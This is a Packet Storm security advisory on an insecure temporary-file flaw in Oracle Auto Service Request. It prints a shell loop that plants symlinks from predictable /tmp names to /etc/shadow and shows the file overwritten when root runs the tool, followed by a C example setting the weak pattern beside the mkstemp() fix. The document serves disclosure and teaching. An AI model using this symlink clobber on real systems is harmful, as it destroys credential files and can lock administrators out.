
Oracle Auto Service Request File Clobber

05 Feb 2013 00:00:00. Reported by Larry W. Cashdollar. Type: packetstorm. Source: packetstormsecurity.com


Code
The Oracle Auto Service Request software package creates files insecurely in /tmp, naming them with timestamps instead of using mkstemp(). You can clobber root-owned files if you know approximately when the root administrator will be using this utility.

```
[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done
```

root executes the asr command:

```
[root@oracle-os-lab01 bin]# ./asr

register OR register [-e asr-manager-relay-url]: register ASR
unregister : unregister ASR
show_reg_status : show ASR registration status
test_connection : test connection to Oracle
.
.
.

version : show asr script version
exit
help : display a list of commands
? : display a list of commands


asr>
```

/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722:

```
root # cat /etc/shadow

id State Bundle
68 ACTIVE com.sun.svc.asr.sw_4.3.1
Fragments=69, 70
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1
Master=68
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1
Master=68
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
Fragments=73
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0
Master=72

67 ACTIVE com.sun.svc.ServiceActivation_4.3.1
```
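The weak pattern the advisory describes, set beside the mkstemp() fix it names, as an added C example that is not Oracle's code and not part of the original advisory. The function names, the scratch directory and the `victim` / `status1_guess` file names are constructed for illustration; nothing outside the scratch directory is touched.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write data to fd and close it: 0 on success, -1 on any error. */
static int put(int fd, const char *data) {
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    return (close(fd) == 0 && n == (ssize_t)strlen(data)) ? 0 : -1;
}

/* Weak: open() follows a symlink already at path and truncates its target. */
int write_predictable(const char *path, const char *data) {
    return put(open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600), data);
}

/* Hardened: mkstemp() fills in six random characters after prefix and creates
 * the file with O_CREAT|O_EXCL, mode 0600, so an existing name is never reused. */
int write_mkstemp(const char *prefix, const char *data) {
    char tmpl[256];
    if (snprintf(tmpl, sizeof tmpl, "%sXXXXXX", prefix) >= (int)sizeof tmpl)
        return -1;
    return put(mkstemp(tmpl), data);
}

/* Constructed scenario in a private scratch dir: "status1_guess" (the guessed
 * name) is planted as a symlink to "victim". Returns 1 if victim stays intact. */
int victim_survives(int (*writer)(const char *, const char *)) {
    char dir[] = "/tmp/asr_demo_XXXXXX", victim[64], guess[64];
    struct stat st;
    if (!mkdtemp(dir))
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(guess, sizeof guess, "%s/status1_guess", dir);
    if (write_predictable(victim, "secret") || symlink(victim, guess))
        return -1;
    writer(guess, "id State Bundle\n");
    return stat(victim, &st) == 0 && st.st_size == 6; /* strlen("secret") */
}

int main(void) {
    printf("victim intact: predictable name=%d, mkstemp=%d\n",
           victim_survives(write_predictable), victim_survives(write_mkstemp));
    return 0;
}
```

Each run leaves its `/tmp/asr_demo_*` scratch directory in place so the resulting files can be inspected.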
